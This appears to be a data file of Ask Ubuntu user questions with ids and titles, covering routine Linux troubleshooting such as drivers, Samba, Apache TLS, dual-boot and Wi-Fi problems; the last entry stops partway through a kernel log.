353075	upstart job does n't stop on `` service something stop ''	could you guys please help with with upstart script ? for some reason it can not stop java process on service something stop . service status says bbb stop/waiting i 'm trying to run my app which is jar file ( java ) . here is how my script looks like description `` bbb api service '' # no start option as you might not want it to auto-start # this might not be supported - you might need a : start on runlevel [ 3 ] start on runlevel [ 3 ] stop on runlevel [ ! 2345 ] # stop on shutdown # if you want it to automatically restart if it crashes , leave the next line in respawn script cd /home/ubuntu/bbb-server/target su -c `` /usr/bin/java -jar /home/ubuntu/bbb-server/target/api_standalone.jar '' nobody end script
353076	sometimes xfce4-power-manager stuck	sometimes the xfce4-power-manager does not show up in the panel and it`s not working at all , and sometimes is working . when it`s not working i have 2 solutions : log out , and log in . start system monitor and kill xfce4-power-manager , then start terminal and type : xfce4-power-manager -- no-daemon usually i use second solution , but to simplify the process i tried to write a shell script that restarts the xfce4-power-manager , with no success . i can not shut down the xfce4-power-manager from terminal . xfce4-power-manager -- restart -is not working xfce4-power-manager -- quit -is not working i tried : # ! /bin/bash pid=`pidof xfce4-power-manager` kill $ pid xfce4-power-manager -- no-daemon -is not working . if i type : xfce4-power-manager -- customize -an error window appears with : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . in the system monitor at waiting chanel says : futex_wait_queue_me . thank you
353077	openshot 1.4.3 no longer recognising blender when making animated titles	i was using openshot and blender to create some animated titles and it was working fine until openshot just started to cry out for blender for no apparent reason . the previews work fine , and some appear to be working . it seems like simple ones involving just text work but any that require 3d modelling do not work . here 's the error i get : blender , the free open source 3d content creation suite is required for this action ( http : //www.blender.org ) . please check the preferences in openshot and be sure the blender executable is correct . this setting should be the path of the 'blender ' executable on your computer . also , please be sure that it is pointing to blender version 2.62 or greater . blender path : blender error output : no frame was found in the output from blender but it was working fine from the same directory before . and it should be a compatible version , as i 've got 2.66a installed . the only thing i can think is that this started happening after ubuntu ( 13.04 raring ringtail ) updated some python files . i 'm not sure what they were exactly , but i know there was an update involving python which i know blender needs to function , so it could be a bug in the latest python or blender being incompatible with it . i can also open blender and use it just fine , but i have n't tried rendering anything in it yet because i do n't know how to use it , so i 'd have nothing to render ! thanks in advance , let me know if you need any more information and/or logs ( but i 'm a complete ubuntu noob , so i 'll need some help if you do want any logs : p ) . edit : just read openshot 's blog and saw that 1.4.4 was released and available through their ppa . i tried installing that , but the problem has n't gone away . here 's the ppa if you 're interested : sudo add-apt-repository ppa : openshot.developers/ppa sudo apt-get update sudo apt-get install openshot openshot-doc another edit : figuring it was a problem with blender i downloaded the latest version ( 2.68a ) which comes in a .tar.bz2 file which is supposed to be run like a portable application . after redirecting openshot 's blender directory to the extracted files the problem still remains . got it from this site : http : //www.blender.org/download/get-blender/
353078	uninstall oracle10 g xe	i wanted to install oracle 10gxe on my ubuntu 13.04.a seperate account named oracle was created but it failed to start..cos full installation did n't take place . now i want to uninstall it and restore to 1st time installation , without having to reinstall the os again . how do i do that . its very urgent sum1 please tell me .. thanks
353081	how can i get desktop notifications to display on both screens	i have a laptop and a secondary screen that i use for most of my work . when notifications are displayed , they are only on the laptop screen . how can i get it to display on both screens ? ubuntu 13.04
353084	broadcom wireless , unable to autoconnect	i have an imac mid-2007 with a broadcom wireless card that is unable to autoconnect to my wireless network , the only way to connect is by : network widget = > connect to hidden network = > ( choose my ssid ) here 's how i installed drivers ( ref : q : âsorry , installation of this driver failed . please have a look at the log file for detailsâ ) : sudo apt-get purge bcmwl-kernel-source sudo apt-get install firmware-b43-installer sudo apt-get install b43-fwcutter any thoughts ? thank you in advance .
353086	how to install tomcat5.5 in ubuntu ?	hi can any one tell me the installation process of tomacat5.5 or higher version in ubuntu . these are my questions for tomcat installation : how to install tomcat in ubuntu ? 2.how to start an stop the tomcat server ?
353088	does anyone know how to install drivers for canon mg3200 from web ?	any help greatly appreciated , fairly new to both ubuntu & linux
353090	how to install ubuntu13.04 with windows xp & remove windows xp ?	i want install ubuntu13.04 from dvd . is it possible without current windows xp os ? if yes please tell me the procedure in steps . if it is not possible then i will have to first install ubuntu13.04 & uninstall windows xp professional . in this case please tell procedure in steps
353092	help with vlc and video capture device error	i am running vlc 2.0.8 and when i try and stream my cctv camera ( an stk1160 video capture device ) i get this error : - cvlc /dev/video0 vlc media player 2.0.8 twoflower ( revision 2.0.8a-0-g68cf50b ) [ 0x7a9618 ] dummy interface : using the dummy interface module ... [ 0x7fb5000013b8 ] main access error : read error : invalid argument [ 0x7fb5000013b8 ] filesystem access error : failed to read ( invalid argument ) [ 0x7fb5000013b8 ] main access error : file reading failed [ 0x7fb5000013b8 ] main access error : vlc could not read the file ( invalid argument ) . [ 0x7fb500001508 ] main stream error : can not pre fill buffer and if i do vlc /dev/video0 i get this error : - file reading failed : vlc could not read the file ( invalid argument ) . and [ 0x615108 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . [ 0x7f17b40014a8 ] main access error : read error : invalid argument [ 0x7f17b40014a8 ] filesystem access error : failed to read ( invalid argument ) [ 0x7f17b40015f8 ] main stream error : can not pre fill buffer please help and thank you .
353093	can i let ubuntu use the same ssd cache drive as windows 8 which is on the same system and hdd as ubuntu ?	i got a pretty straightforward question . first let me explain the structure that i have in mind : i got a 24gb ssd which will function as a cache drive i got a 1tb hdd which will be used to install ubuntu and windows 8 . so two partitions basically . i want to let ubuntu and windows 8 use the same cache drive . so the question is then , is this approach possible ? thanks ,
353097	cursor is a dot when establish connection via xrdp	hi i have an xrdp server running on ubuntu 12.04 lts . a proper connection is established and i can access my screen remotely the only shortcoming i have is my cursor appears as a dot on remote screen . any suggestion what is reason behind this . ? edits and answer would be appreciated .
353099	the cursor flashes but nothing can be entered	i installed ubuntu from an install disk . during installation the c drive was partitioned as requested by myself . all went well with ubuntu until , for no reason known to myself , the cursor will flash in all instruction boxes but no words ( type ) can be inserted , making the operating system completely useless . windows xp pro is the other operating system on the computer . the computer has no known defects , has 2gb memory and 80gb hard drive . would you please be able to advise me of the full instruction procedure of how to reinstall ubuntu as the only operating system on my computer .
353102	problem oracle installing from windows directory in ubuntu 13.04	i have two os windows 7 and ubuntu . oracle installer for linux stored in /media/sonnet/main/oracle/disk1/ and /media/sonnet/main/oracle/disk2/ here `` main '' is an windows ( ntfs ) drive . when i 'm trying to start installing it is replying ./runinstaller : permission denied i have tried chmod -r 777 runinstaller also the same result . thanks in advance for reply .
353103	upgrading 11.10 to 12.04	trying to upgrade , i get a pop up that tells me the authenticator for the approval updating tool failed . what can i do ? regards kulalila
353104	hdparm time settings	i am a linux noob who is trying to get hdparm working with my wd green drives i have used wdidle3 to disable head-parking and i just now need to set drives to spindown when not being used for a couple hours i have some drives i need on demand but do n't access for up to 1 week at a time so would like to spindown it has worked setting them to sudo hdparm -s180 /dev/sd ? but i need a longer time like at least 2 to 5 hours i have looked at guides and they have given me times but i have set them and left them overnight and still in the morning they are spinning when i run sudo hdparm -c /dev/sd ? does anyone know the correct working times i am using a distro based on ubuntu 12.04 lts
353108	dell inspiron 15r the fan is always at the highest speed	i have a dell inspiron 15r it supposed to be certified with ubuntu , the fan is always at the highest speed , some posts mentions its a vga driver issue , however even if i install latest drivers from additional drivers from the amd site , still the fan is at highest . i hope someone has a solution for this the hardware configuration is 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 6601 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 08:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 )
353110	ubuntu 13.04 on external drive not getting detected by windows 8 laptop	i have a laptop with windows 8 installed and an external hard disk with ubuntu 13.04 installed which i connect through usb . i have installed grub on my external hard drive . previously i was able to boot from my external drive without any problem . but now when i boot , my external drive is not displayed in boot options menu . i have one ntfs partition on my external drive and windows detects it . so , my laptop or external drive does not have any hardware problem . i tried to boot from my external hard drive on another computer which does not have uefi or windows 8 . it has both windows 7 and ubuntu 13.04 as dual boot . when i first booted from external drive , i got grub rescue screen . i followed the procedure given on how to fix `` error : unknown filesystem . grub rescue > . i was able to boot into ubuntu , but it was showing '/boot/efi ' is not ready . i skipped mounting it and it worked . i thought the issue is fixed . but when i connected to my laptop , again it was not getting detected in boot options menu . what could be the problem and what is the solution for this ?
353114	how can i know which machine juju is actually using ?	i am trying juju on azure and i have installed quite a few services that i have now destroyed to keep only the minimum services . but now i can see i have 8 virtual machines created on azure while i have reduced the number of services to just 4 . so i guess when juju needs a new machine it creates it but then destroying the service did not destroy the machine it was running on . how can i do some cleanup ? i would like to know which machines are unused and destroy them .
353115	how can i tell why a sata pci card fails ?	i have a home built mediaserver that has 11 hard drives . 5 come off the mb but 4 come off one pci sata card and 3 come off the other . for some reason the pci seem to disconnect requiring a reboot . i do n't think it is a heat issue because it is well ventilated . i have a 750 watt psu which should be plenty . is there a way to check my logs or error files to figure out what is going on ? if i ca n't figure it out i am going to get an 8 port pci sata controller card if i cant get this to work but before i do that i want to make sure it is not something simple .
353117	firefox not preserving the home page settings after restart	whenever i change the firefox homepage from yahoo.com ( about : config , enter new address in list ) , the changes are not preserved when i restart firefox . what can i do ?
353118	ubuntu 13.04 custom keyboard layout	using ubuntu 13.04 , i want the prtsc key to work as menu on lenovo s430 keyboard . /usr/bin/xmodmap /home/user/.xmodmap with modified line keycode 107 = menu nosymbol menu nosymbol menu does not work . any advice ?
353119	flash player minimizes , 2 monitors	i have to screens . when i watch a flash video on one screen and then interact with the other screen the flash player minimizes itself back to the embedded mode . this happens in chrome and firefox ( only 2 i tested ) . this happens in youtube and vimeo ,
353122	random crashes after nvidia instalation , even before boot !	i 've recently bought my desktop a pny geforce gtx 650 ti boost so i could play steam games on ubuntu . i 've also bought a brand-new 500 w power supply unit because my older one would n't be able to handle the extra work and did n't have a pci-e plug . after carefully installing the hardware , i proceded to install the drivers . in order to do so , i 've followed luis alvarado 's tips from here . baiscally , it involved installing the nvidia-325 package from the xorg-edgers ppa then running sudo nvidia-xconfig to create a new xorg.conf . the instalation seems to have gone without errors or even warnings , and my computer was finally able to run resource-intensive games . however , every now and then the computer freezes . to better describe the problem : the screen always freezes ; the sound usually goes into a loop ( rarely it keeps runnning , indicating that only the screen had freezed ) ; there 's absolutely no mouse or regular keyboard feedback . 90 % of the time i have to alt+prtscrn+r+e+i+s+u+b my way through a restart , but sometimes not even that works ; it seems to occur at random intervals , usually when i 'm running steam games , but sometimes when i 'm on unity , working on spreadsheets and statistics software . what intrigues me is that sometimes it occurs even before the system boots ( at the first post screen , which presents the geforce card ) . this makes me wonder whether the problem is n't actually in the hardware itself ( which would be a shame , because it costed me a small fortune and i ca n't return it anymore ) . so far , none of these has solved the issue : reinstalling the 325 driver ; installing older drivers ; installing nvidia-settings to see if there were any problems such as overheating ( there is n't : the card runs at a comfy 45 celsius even after extensive work ) ; installing steam-login in an attempt to bypass any issues the card might be having with my onboard intel graphics . since the problem sometimes occur during post , i guess configuring something on my my cmos might help . the problem is i 'm kind of lost . here 's some settings i think might help ( from `` advanced chipset features '' ) : intel eist : enabled ( gv3 ) ; intel xd bit : enabled ( when disabled , force the xd feature flag to always return 0 ) intel vt : enabled ( when enabled , a vmm can utilize the additional hw caps . provided by intel virtualization tech ) memory hole remapping : enabled ( allow remapping of overlapped pci memory above the total physical memory ) video memory size : 32mb ( other options : 64mb and 128mb ) dvmt mode : dvmt ( other option : fixed ) dvmt/fixed memory size : 256mb ( other options : 128mb and maximum ) my computer is plugged to a 24 ' lg tv through an hdmi cable , instead of a regular monitor . could this be the source of the problem ( or worsen it ) ? unfortunately , i do n't have a computer monitor here to test it . all i know is that even though i feel like i 've already read all the `` my computer is freezing '' questions on ask ubuntu , i 've run out of ideas on how to diagnose and fix the problem .
353123	can not get nvidia drivers working on lenovo y510p	i can not get nvidia drivers to load on my lenovo y510p . it ends up in either of 2 different states , either nothing loads , and i 'm stuck in runlevel3 , or i get a super low resolution desktop . i have tried every tutorial i could find ( though most say the same thing ) if anyone has any insight , please help me out . i 'm out of options .
353124	how do i install ubuntu on a pre installed windows 8 ?	i need some help . i 'm new to the linux world , so i want to try ubuntu , but i have a problem , i ca n't install ubuntu . i tried almost everything and i do n't know what else i can do . i tried with universal usb installer to make a partition on an usb drive , but when i have to access the bios ( uefi for windows 8 ) to install ubuntu my screen stay black . basically i ca n't enter the bios , i tried to press shift+reboot and then to go troubleshoot and then uefi firmware settings , but nothing , black screen , also to press f2 , f10 , f12 , esc , del , nothing , same result . it 's there any other way to install ubuntu ? thanks !
353127	migration from generic openstack to ubuntu openstack	does anyone have experience and advice in migrating from a generic openstack cloud to one based on ubuntu tools ( including maas , juju , landscape , etc ) ? we are hitting the limit on our install , and wish we had used ubuntu openstack from the start ... but now that we are up and running , are a little nervous about attempting a switch .
353130	black screen upon reinstall of fglrx	i have been trying to setup the vgaswitcheroo after a complete reinstall of ubuntu 12.04 . along the way i uninstalled the fglrx proprietary driver and rebooted with the understanding that the standard ubuntu driver would take over . i am now at the stage where i keep on getting a black screen . i have rebooted and set the kernel boot option to `` nomodeset '' as indicated by some , i have also reinstalled fglrx as indicated on this page : https : //help.ubuntu.com/community/binarydriverhowto/ati through the command line . as well as this page : my computer boots to a black screen , what options do i have to fix it ? . i keep on get this black screen . output of the following are : $ lspci -vvnn | grep vga intel second generation core processor ... ... advanced micro devices , inc [ amd/ati ] seymour radeon hd 6400/7400 series there are some lines with the words vgasnoop parerr stepping serr fastb2b disintx sorry for being so cryptic but i am typing on the other pc $ glxinfo | grep -i opengl error : unable to open display i have a hp pavilion dv6 laptop running ubuntu 12.04 help is much appreciated .
353131	unlock gnome 3 without mouse	when i want to unlock my screen in a gnome 3 session , i have to use my mouse to `` drag up '' the screen and uncover the password input . i would prefer to not use the mouse for that action since i am using a notebook and that kind of gesture is really annoying .
353143	domain-name dhcp option not applying to hostname -f	my ubuntu 12.04.3 machine is not getting the domain-name option from dhcp applied to the fqdn returned by hostname -f ( dnsdomainname returns nothing ) . ip config : # ip a 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether fc:4d : d4:31:89 : cb brd ff : ff : ff : ff : ff : ff inet 10.101.100.166/16 brd 10.101.255.255 scope global eth0 5 : vmnet1 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state unknown qlen 1000 link/ether 00:50:56 : c0:00:01 brd ff : ff : ff : ff : ff : ff inet 192.168.185.1/24 brd 192.168.185.255 scope global vmnet1 6 : vmnet8 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state unknown qlen 1000 link/ether 00:50:56 : c0:00:08 brd ff : ff : ff : ff : ff : ff inet 172.16.10.1/24 brd 172.16.10.255 scope global vmnet8 tail of dhcp lease : # tail -16 /var/lib/dhcp/dhclient.eth0.leases lease { interface `` eth0 '' ; fixed-address 10.101.100.166 ; option subnet-mask 255.255.0.0 ; option routers 10.101.0.1 ; option dhcp-lease-time 14400 ; option dhcp-message-type 5 ; option domain-name-servers 10.101.200.1,10.101.200.2 ; option dhcp-server-identifier 10.101.200.1 ; option dhcp-renewal-time 7200 ; option dhcp-rebinding-time 12600 ; option domain-name `` eng.sophos '' ; renew 4 2013/10/03 14:14:24 ; rebind 4 2013/10/03 16:01:08 ; expire 4 2013/10/03 16:31:08 ; } resolv.conf : # cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 10.101.200.1 nameserver 10.101.200.2 search eng.sophos search eng.sophos green.sophos /etc/hosts : # head /etc/hosts 127.0.0.1 localhost 127.0.1.1 abelard
353145	clipboard manager history synchronization	is there a clipboard manager with history synchronization between multiple computers using e.g . ubuntu one/dropbox/.. ? currently i use glipper , it has the network plugin , but this needs the other computer to run in order to synchronize .
353149	can configure apache2 for run j2ee applications	can configure apache2 for run j2ee ( jsp and servlets ) applications using the same apache 2 install by lamp directly for runing php . please mail me at ajuiet007 [ at ] gmail.com if wither i can do it for the same . thanks in advance .
353154	sony vaio vpc-ec series , cpu temperature very high .	i know this has been asked quite a few times before , but after some intense research i still could not fix my cpu problems . i 'm running ubuntu on a sony vaio from the vpc-ec series . under windows 7 i never got similar high temperatures nor fan noise . on ubuntu i have a constant temperature of about 55째 and a very loud fan ( e.g . when only firefox is running ) . i already applied all hints from this post that works mainly with tlp to adjust power safe options ( i.e . cpu usage and others ) ... but i had almost no effect at all . can anyone give me some advice on what to do next or how to find out what the problem is ? i tried really a lot of stuff , but it seems that i just ca n't get this done properly .
353167	dragon naturally speaking in ubuntu	i 'm trying to get dragon naturally speaking working through ubuntu ... . i set it up in virtualbox , but i found it incredibly tough to access its features through linux . i know there is a way to do it through wine , because this dude did a pretty sick hack for speech recognition in python . youtube.com : using python to code by voice also i know theres a neat little python hack called dragonfly that works . my overall goal here is to create my own commands using my keyboard ( piano ) that correspond to cool functions like unlocking my computer or something ( imagine how cool it would be if your password was the noise the guy in the movie contact plays for the aliens or something like that ) . arbitrary references aside , this is my first post on the forums so please go easy on me . i 'm also relatively new to ubuntu and the linux format , but if someone could walk me through the steps to get dragon naturally speaking 12 premium edition working on ubuntu 's latest version ( whatever i downloaded like 3 weeks ago ) i 'm pretty sure i can struggle through making some custom macros myself . i have googled and tried a number of different approaches through wine , but , none have been successful thus far . cheers !
353169	how do i share a folder between linux installs ?	i 've included the following in /etc/sambe/smb.comf so that i can edit files on our webserver from a windows machine - [ websites ] comment = websites browseable = yes writable = yes path = /var/www/html/ valid users = dgard however , i 've now installed ubuntu ( 13.04 ) on to my machine and i wish to connect to the path specified above from it , but i can not find out how . i 've tried connect to server from nautilus with the following , but it fails - sftp : //dgard @ webserver.local/var/www/html can anyone please let me know what i need to do ? thanks . note : my webserver does not have a desktop installed .
353170	install ubuntu in mobile on windows phone	i had windows phone ( lumina 520 ) which contains windows 8 o.s now i want to install ubuntu in it . is it possible to install ubuntu in it , if possible plese provide me the steps .
353174	read only n first lines from something	when i 'm saying something like curl http : //example.com/123 and i want to read only n first lines , how do i do that ? i know that 's something like : curl http : //example.com/123 | ? ? ?
353175	is there any way i can integrate minitube with a web browser like chrome ?	i really enjoy using minitube . it 's a very comfortable and lightweight alternative to youtube playback with flash . the only thing that bothers me is that i have to manually copy and paste interesting youtube links i found into the program to play them back . is there any way i can automate this and integrate minitube into google chrome or another web browser ?
353181	move gnome 3.10 window close button to left side	how can i move the close window button from right to left side ? nautilus i upgrated the gnome from 3.8 to gnome 3.10.0.1 . i already moved the maximize , minimize and close buttons to left side with the following result : mozilla firefox ... but it seems that the nautilus ( for example ) close button is not moved . why ? how can i move it ? the answers posted to this question did n't solve the problem .
353183	not able to open ubuntu after installation	i 'm not able to open my ubuntu , after the installation from the boot menu by usb drive the computer does n't ask whether to run ubuntu or windows 7 . i have installed windows 7 in c : drive and ubuntu in d : drive . please help me .
353184	do n't have permissions to read a file in a samba share	what i 'm trying to do add an external jar to my eclipse project . eclipse is on windows 7 and the jar in on an ubuntu server running samba . the problem eclipse says i do n't have permission to read the file . if i open properties on the jar file in windows , it says i do n't have permission to change security . it does this even if i 'm the administrator . details windows 7 sp1 , ubuntu server 13.04 smb.conf [ global ] workgroup = workgroup server string = % h server ( samba , ubuntu ) dns proxy = no interfaces = 192.168.1.15/8 wlan0 log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d security = user guest account = smbguest guest ok = yes encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user socket options = tcp_nodelay usershare allow guests = yes [ homes ] comment = home directories [ tomcat7_examples ] comment = tomcat7 examples folder read only = no path = /usr/share/tomcat7-examples [ tomcat7 ] comment = tomcat7 shared folder read only = no path = /usr/share/tomcat7 most of the global settings come from the sample config file . what i 've tried changing the owner , group , and permissions on the jar file in ubuntu changing the security type in smb.conf adding a guest user in ubuntu other things i 've forgotten
353187	where is my ubuntu installed ?	i installed ubuntu 13.04 alongside windows 8 using the iso file from official website . in ubuntu 12.04 , i used wubi to install and then it was clear that ubuntu was installed in windows . i installed ubuntu 13.04 without wubi and i could not figure out whether ubuntu is installed in windows or windows resides in ubuntu . following screenshots may give a hint . in windows , this 378gb disk was my c : drive . i have no idea where this system came from . here comes the ubuntu root directory . is it that system is now the head of both c : drive and ubuntu ? p.s : i asked this question here as having this confusion will definitely trouble people in upgrading windows or ubuntu and when anything is problematic with ubuntu , people come to this website .
353190	how force that all connections to my apache use tlsv1.1 or tlsv1.2 ?	i tested on ubuntu 12.04 ( apache 2.2.22-1ubuntu1.4 and openssl 1.0.1-4ubuntu5.10 ) and ubuntu 13.04 ( apache 2.2.22-6ubuntu5.1 and openssl 1.0.1c-4ubuntu8.1 ) . here explain how to do so , but i have the following problems : when try to use : sslprotocol all -sslv2 -sslv3 -tlsv1 i got the following error : [ error ] no ssl protocols available [ hint : sslprotocol ] when try to use : sslprotocol tlsv1.1 tlsv1.2 i got the following error : [ error ] no ssl protocols available [ hint : sslprotocol ] th funny thing is that when i use : sslprotocol all -sslv2 -tlsv1 apache do n't complain and this test reported that my server not support sslv2 and tlsv1.0 , but yes sslv3 , tlsv1.1 and tlsv1.2 . any explanation to that odd behavior ? maybe the test tool is broken ? how can i enable just tlsv1.1 and tlsv1.2 ?
353193	wifi wo n't connect - ubuntu	ive been scouring the ubuntu forums for hours trying lots of different things but they all seem to be specific to someone 's terminal output , my wifi finds networks but wo n't connect , wired connection is working ok , i have also looked for a linux driver for my specific pci card but ca n't seem to find one . wifi adapter : ralink corp. rt3062 wireless 802.11n 2t/2r iwconfig : eth0 : no wireless extension lo : no wireless extension wlan0 : ieee 802.11bgn -- - essid : off/any mode : managed -- - access point : not-associated -- tx-power=20 dbm retry -- - long limit : 7 -- - rts thr : off -- - fragment thr : off power managment : off please request more information if needed . update more info : uname -a linux anonymous 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux dmesg [ 1.607468 ] ehci-pci 0000:00:12.2 : new usb bus registered , assigned bus number 1 [ 1.607473 ] ehci-pci 0000:00:12.2 : applying amd sb700/sb800/hudson-2/3 ehci dummy qh workaround [ 1.607484 ] ehci-pci 0000:00:12.2 : debug port 1 [ 1.607521 ] ehci-pci 0000:00:12.2 : irq 17 , io mem 0xfe02c000 [ 1.618869 ] ehci-pci 0000:00:12.2 : usb 2.0 started , ehci 1.00 [ 1.618901 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.618903 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.618904 ] usb usb1 : product : ehci host controller [ 1.618906 ] usb usb1 : manufacturer : linux 3.8.0-19-generic ehci_hcd [ 1.618907 ] usb usb1 : serialnumber : 0000:00:12.2 [ 1.618993 ] hub 1-0:1.0 : usb hub found [ 1.618996 ] hub 1-0:1.0 : 6 ports detected [ 1.619092 ] ehci-pci 0000:00:13.2 : ehci host controller [ 1.619097 ] ehci-pci 0000:00:13.2 : new usb bus registered , assigned bus number 2 [ 1.619101 ] ehci-pci 0000:00:13.2 : applying amd sb700/sb800/hudson-2/3 ehci dummy qh workaround [ 1.619112 ] ehci-pci 0000:00:13.2 : debug port 1 [ 1.619144 ] ehci-pci 0000:00:13.2 : irq 19 , io mem 0xfe029000 [ 1.630845 ] ehci-pci 0000:00:13.2 : usb 2.0 started , ehci 1.00 [ 1.630876 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.630877 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.630879 ] usb usb2 : product : ehci host controller [ 1.630880 ] usb usb2 : manufacturer : linux 3.8.0-19-generic ehci_hcd [ 1.630881 ] usb usb2 : serialnumber : 0000:00:13.2 [ 1.630951 ] hub 2-0:1.0 : usb hub found [ 1.630953 ] hub 2-0:1.0 : 6 ports detected [ 1.631034 ] ehci-platform : ehci generic platform driver [ 1.631040 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 1.631061 ] ohci_hcd 0000:00:12.0 : ohci host controller [ 1.631064 ] ohci_hcd 0000:00:12.0 : new usb bus registered , assigned bus number 3 [ 1.631087 ] ohci_hcd 0000:00:12.0 : irq 16 , io mem 0xfe02e000 [ 1.690645 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.690647 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.690649 ] usb usb3 : product : ohci host controller [ 1.690650 ] usb usb3 : manufacturer : linux 3.8.0-19-generic ohci_hcd [ 1.690651 ] usb usb3 : serialnumber : 0000:00:12.0 [ 1.690719 ] hub 3-0:1.0 : usb hub found [ 1.690725 ] hub 3-0:1.0 : 3 ports detected [ 1.690794 ] ohci_hcd 0000:00:12.1 : ohci host controller [ 1.690797 ] ohci_hcd 0000:00:12.1 : new usb bus registered , assigned bus number 4 [ 1.690809 ] ohci_hcd 0000:00:12.1 : irq 16 , io mem 0xfe02d000 [ 1.750463 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.750465 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.750467 ] usb usb4 : product : ohci host controller [ 1.750468 ] usb usb4 : manufacturer : linux 3.8.0-19-generic ohci_hcd [ 1.750469 ] usb usb4 : serialnumber : 0000:00:12.1 [ 1.750538 ] hub 4-0:1.0 : usb hub found [ 1.750543 ] hub 4-0:1.0 : 3 ports detected [ 1.750611 ] ohci_hcd 0000:00:13.0 : ohci host controller [ 1.750615 ] ohci_hcd 0000:00:13.0 : new usb bus registered , assigned bus number 5 [ 1.750638 ] ohci_hcd 0000:00:13.0 : irq 18 , io mem 0xfe02b000 [ 1.810284 ] usb usb5 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.810286 ] usb usb5 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.810287 ] usb usb5 : product : ohci host controller [ 1.810289 ] usb usb5 : manufacturer : linux 3.8.0-19-generic ohci_hcd [ 1.810290 ] usb usb5 : serialnumber : 0000:00:13.0 [ 1.810358 ] hub 5-0:1.0 : usb hub found [ 1.810363 ] hub 5-0:1.0 : 3 ports detected [ 1.810434 ] ohci_hcd 0000:00:13.1 : ohci host controller [ 1.810438 ] ohci_hcd 0000:00:13.1 : new usb bus registered , assigned bus number 6 [ 1.810449 ] ohci_hcd 0000:00:13.1 : irq 18 , io mem 0xfe02a000 [ 1.870109 ] usb usb6 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.870111 ] usb usb6 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.870112 ] usb usb6 : product : ohci host controller [ 1.870114 ] usb usb6 : manufacturer : linux 3.8.0-19-generic ohci_hcd [ 1.870115 ] usb usb6 : serialnumber : 0000:00:13.1 [ 1.870190 ] hub 6-0:1.0 : usb hub found [ 1.870195 ] hub 6-0:1.0 : 3 ports detected [ 1.870264 ] ohci_hcd 0000:00:14.5 : ohci host controller [ 1.870267 ] ohci_hcd 0000:00:14.5 : new usb bus registered , assigned bus number 7 [ 1.870278 ] ohci_hcd 0000:00:14.5 : irq 18 , io mem 0xfe028000 [ 1.929926 ] usb usb7 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.929930 ] usb usb7 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.929934 ] usb usb7 : product : ohci host controller [ 1.929959 ] usb usb7 : manufacturer : linux 3.8.0-19-generic ohci_hcd [ 1.929961 ] usb usb7 : serialnumber : 0000:00:14.5 [ 1.930033 ] hub 7-0:1.0 : usb hub found [ 1.930038 ] hub 7-0:1.0 : 2 ports detected [ 1.930089 ] uhci_hcd : usb universal host controller interface driver [ 1.930122 ] xhci_hcd 0000:02:00.0 : xhci host controller [ 1.930125 ] xhci_hcd 0000:02:00.0 : new usb bus registered , assigned bus number 8 [ 1.930227 ] xhci_hcd 0000:02:00.0 : irq 44 for msi/msi-x [ 1.930263 ] usb usb8 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.930265 ] usb usb8 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.930266 ] usb usb8 : product 